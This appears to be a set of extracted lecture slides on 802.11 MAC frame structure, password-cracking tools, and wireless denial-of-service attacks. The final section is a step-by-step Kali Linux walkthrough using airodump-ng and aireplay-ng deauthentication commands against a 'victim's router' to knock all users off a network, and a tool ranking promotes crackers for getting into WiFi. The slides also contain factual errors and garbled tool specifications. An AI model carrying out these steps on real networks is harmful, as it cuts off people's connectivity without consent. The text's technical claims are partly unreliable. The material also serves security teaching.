The document discusses wireless frame generation, password cracking tools, and wireless denial of service (DoS) attacks. It provides details on: - The structure and fields of IEEE 802.11 wireless MAC frames, including frame control, duration, address, sequence control, and frame check sequence fields. - Common password cracking tools like CrackStation, AirCrack, and John the Ripper, describing their features and how they perform dictionary, brute force, and rainbow table attacks. - How to conduct a wireless DoS attack against a WiFi network to disconnect users by sending authentication packets using the aireplay-ng tool in Kali Linux after scanning for the target network's BSSID and channel.

1. UNIT-3
WIRELESS FRAME GENERATION , ENCRYPTION CRACKING TOOLS, WIRELESS DOS ATTACKS

2. Wireless Frame Generation
MAC Frame: The MAC layer frame consists of 9 fields. The following figure shows the basic
structure of an IEEE 802.11 MAC data frame along with the content of the frame control field

3. Frame Control(FC) – It is 2 bytes long field which defines type of frame and some control
information. Various fields present in FC are:
1.Version: It is a 2 bit long field which indicates the current protocol version which is fixed
to be 0 for now.
2.Type: It is a 2 bit long field which determines the function of frame i.e management(00),
control(01) or data(10).
3.Subtype: It is a 4 bit long field which indicates sub-type of the frame like 0000 for
association request, 1000 for beacon.
4.To DS: It is a 1 bit long field which when set indicates that destination frame is for
DS(distribution system).
5.From DS: It is a 1 bit long field which when set indicates frame coming from DS.
6.More frag (More fragments): It is 1 bit long field which when set to 1 means frame is
followed by other fragments.

4. 7.Retry: It is 1-bit long field, if the current frame is a retransmission of an earlier frame,
this bit is set to 1.
8.Power Mgmt (Power management): It is 1-bit long field that indicates the mode of a
station after successful transmission of a frame. Set to 1 the field indicates that the
station goes into power-save mode. If the field is set to 0, the station stays active.
9.More data: It is 1-bit long field that is used to indicate receiver that a sender has more
data to send than the current frame. This can be used by an access point to indicate to a
station in power-save mode that more packets are buffered or it can be used by a station
to indicate to an access point after being polled that more polling is necessary as the
station has more data ready to transmit.
10.WEP: It is 1 bit long field which indicates that the standard security mechanism of
802.11 is applied.
11.Order: It is 1 bit long field, if this bit is set to 1 the received frames must be
processed in strict order.

5. •Duration/ID – It is 4 bytes long field which contains the value indicating the period of
time in which the medium is occupied(in µs).
•Address 1 to 4 – These are 6 bytes long fields which contain standard IEEE 802 MAC
addresses (48 bit each). The meaning of each address depends on the DS bits in the
frame control field.
•SC (Sequence control) – It is 16 bits long field which consists of 2 sub-fields, i.e.,
Sequence number (12 bits) and Fragment number (4 bits). Since acknowledgement
mechanism frames may be duplicated hence, a sequence number is used to filter
duplicate frames.
•Data – It is a variable length field which contain information specific to individual
frames which is transferred transparently from a sender to the receiver(s).
•CRC (Cyclic redundancy check) – It is 4 bytes long field which contains a 32 bit
CRC error detection sequence to ensure error free frame.

6. features of the IEEE 802.11 MAC frame:
Frame Control Field: The frame control field contains information about the type of
frame, the data rate, and the power management status.
Duration Field: The duration field specifies the length of time that the channel will be
occupied by the transmission.
Address Fields: The address fields specify the source and destination MAC addresses
of the Wi-Fi devices involved in the communication.
Sequence Control Field: The sequence control field is used to identify and manage
the transmission sequence of the frames.
Frame Body: The frame body contains the actual data being transmitted between Wi-
Fi devices, such as IP packets, TCP segments, or UDP datagrams.
Frame Check Sequence: The frame check sequence (FCS) is used to check the
integrity of the data transmitted in the frame and to detect any transmission errors.

7. Management, Control, and Data Frames: The IEEE 802.11 MAC frame
defines three types of frames: management frames, control frames, and data
frames. Management frames are used for network management, control frames
are used for coordination between Wi-Fi devices, and data frames are used for the
transmission of actual data.
Fragmentation: The IEEE 802.11 MAC frame supports fragmentation, which
allows large data packets to be divided into smaller fragments for transmission.
Acknowledgments: The IEEE 802.11 MAC frame uses acknowledgments to
confirm the successful transmission of frames and to request the retransmission of
any frames that were not successfully received.

8. 1) What are Password Cracking tools?
Answer: These tools use different techniques to recover forgotten passwords. Some apps try to guess the passwords.
Others recover the passwords from a file stored in a local or remote location. Additionally, password cracking tools
also help in finding out vulnerabilities in web applications.
2) How does Password Cracking apps work?
Answer: These applications make use of different methods for recovering passwords. Common techniques used
used include Dictionary Attack, Brute Force Attack, Rainbow Table Attack, Cryptanalysis, and simply guessing the
guessing the password.
3) What are the uses of a Password Cracking application?
Answer: Password cracking software can be used to recover passwords that have been forgotten. You can also use
also use the tool for recovering social media accounts that have been stolen.
The tool can also be used by security experts to detect vulnerabilities. Web application developers can also use
use password cracking tools to find out about security issues. It can help them to secure the authentication algorithm
algorithm to protect the app against online attacks.

9. 4) Is it legal to use a Password Cracking tool?
Answer: You can use this tool for recovering stolen or forgotten passwords. But it’s illegal to use a
password cracking tool for hacking into another person’s account or data.
CrackStation
CrackStation is a free online service for password hash cracking. This technique is a variation of the
Dictionary Attack that contains both dictionary words and passwords from public password dumps.
The service cracks password hashes by using pre-computed lookup tables consisting of over 15-
billion entries that have been extracted from various online resources.
Features:
•Password hash cracking
•Supports LM, NTLM, md2, md4, md5, md5(md5_hex), md5-half, sha1, sha224, sha256, sha384,
sha512, ripeMD160, whirlpool, MySQL 4.1+ (sha1(sha1_bin)), QubesV3.1BackupDefaults.
•Uses Look-up table with +15 billion entries.
•Works only for ‘nonsalted hashes’.

10. AirCrack
Best for retrieving Wi-Fi passwords for free using FMS Attack and other techniques.
AirCrack is a free desktop application used for cracking Wi-Fi passwords. The software cracks
WPA and WEP passwords. It can also be used to improve Wi-Fi security through monitoring, fake
access points, and testing connections. The application analyzes encrypted packets and tries to
crack them using its algorithm
Features:
•Works on Windows, OS X, Linux, FreeBSD, NetBSD, OpenBSD, Solaris, and eComStation2.
•Uses FMS Attack.
•Supports WEP and WPA passwords.
•Monitoring, analyzing, and testing a Wi-Fi connection

11. John The Ripper
Best for detecting weak passwords on Unix and macOS operating systems for free.
John The Ripper is a free tool that can be used for remote and local password recovery. The software
can be used by security experts to find out the strength of the password. This tool uses Brute Force
attack and Dictionary Attack features to detect passwords.
Features:
•Password cracking using BruteForce and Dictionary Attack techniques.
•Supports macOS, Linux, BeOS, OpenVMS, and Windows.
•Large password has files
•Support MIC, AVX2, AVX-51, ASIMD, MD54, and SHA protocols
Verdict: John the Ripper is a popular open-source free cracking tool. You can use the software for free
for both commercial and non-commercial purposes. The tool has primarily been developed to detect
UNIX passwords. However, it can also be used for cracking Windows LM and other types of password
hashes.
Price: John the Ripper is available in two formats. The free, open-source format can be downloaded
and modified for non-commercial purposes. The commercial version of the software is also free and
that is available for Linux and Mac OS X on Intel and AMD processors. The only difference is that the
Pro version is in the native format that is targeted for specific operating systems.

12. 10 Best Password Cracker Software Solutions Ranked
AirCrack stands tall as the best password cracker thanks to features like wide system compatibility, easy
WiFi access, and a wide knowledge base. Here’s how it stacks up against others on the list:
1.AirCrack — The best password cracker in 2023 with helpful documentation to help you access WiFi
whenever you need it.
2.Password Cracker — Get multi-language support reveal your old Windows passwords.
3.Rainbow Crack — Access pre-made Rainbow Tables to attempt brute for password cracking, or build
your own.
4.Medusa — Test your organization’s password health with this cracker tool, with the right technical
know-how.
5.Brutus — When you need to crack a Windows password, this is your go-to tool, it’s the best free
password cracker for the OS.
6.Crack Station — Create a free account and contribute to the tool’s comprehensive look-up tables to
start cracking passwords.
7.OphCrack — An open-source password cracker using brute force techniques that work across
Windows, Mac, and Linux.
8.Hashcat — A comprehensive tool to crack multiple passwords at once across OSs and devices,
trusted by security testers.
9.John the Ripper — Check your password health locally or remotely using multiple password cracking
techniques.
10.THC Hydra — The best WiFi password cracker that also helps check your mobile and web app
password health.

13. What does a DOS Attack do?
A Dos attack means to shut down a computer or the whole network, making it unreachable to its users. It
is accomplished by sending a huge request traffic, or by sending some data that make the server crash.
Attackers mainly target web servers like media companies, e-commerce websites, banking, etc. Most of
the time, a dos attack doesn’t result in loss of data.
Types of Dos Attack
There are 3 types of Dos attacks:
1. Application-layer flood: In this type of attack, an attacker sends a large number of requests on a
server, which results in server crashes and slow speeds of the network. In Application-layer flood requests
may vary within the range of thousands in a second to million, which consume huge resources until the
server crash or is unreachable to the user.
2.Distributed Denial of Services Attacks: There is not much difference between a Dos and DDoS attack.
In this attack, not only one computer sends requests but several computers are engaged in sending
requests to a specific target, making it disabled. These computers have been hacked earlier and can be
controlled by the attacker.
3. Unintended Denial of Service Attacks: This type of attack is wicked, i.e they are not nefarious. In this
attack, websites are overwhelmingly flooded with legitimate traffic to their destination where the server is
brought down completely.

14. How To Perform a DOS Attack on WiFi?
Hacking wifi is the best way to check the security parameters and vulnerabilities over a network. In this
attack, we will use aircrack-ng and make the user unable to use wifi via dos attack. In this attack, we
will just scan all available Wifi networks and collect their BSSID, channel, and type of security. Then we
will disable user access from wifi by sending packets to its wireless access point.
Before starting, make sure you have a kali-linux in your computer and a Wifi adaptor with monitor
mode.
Make sure Kali-Linux is fully updated.
sudo apt update && sudo apt upgrade
Now, you are ready to perform a dos attack.
•Start your kali-linux. Now open your terminal in three windows.
• Type ifconfig in the terminal to see the wireless adaptor.
•Just note down your wifi name.
•In next step, we have to turn on monitor mode in our wifi adaptor. To turn on this, we will use the
below command.
• airmon-ng start <wifi name>

15. •To check whether your wireless adaptor is in monitor mode or not, use this command.
iwconfig
Scan nearby networks for their BSSID and its channel.
airodump-ng -i <wifi name>
BSSID stands for Basic Service Set Identifier, and it's the MAC physical address of the access point or
wireless router that is used to connect to the WiFi
•Now, stop the scanning process after copying the BSSID of the victim router.
•To send the packet which makes the user inaccessible to a wifi network, type the below command.
aireplay-ng -0 <number of packets> -a <bssid of target network> -c <target client> <wifi name>
1.bssid of target network = copy the BSSID of victim’s router.
2.Target client=paste the MAC address of the user, you want to disconnect specifically. (optional)
3.Wifi name= your adaptor name.
•Now, we need to configure our channel.
•Stop the network scanning. Press CTRL+C.
airodump-ng -c <broadcasting channel of router> -i <wifi name>

16. •To disconnect all users type the below command.
aireplay-ng -0 <number of packets> -a <bssid of target network> -c <target client> <wifi
name>
•This will send an authentication packet and make all users inaccessible to the wifi network.
Now, no user will have permission to connect with the network until we stop sending packets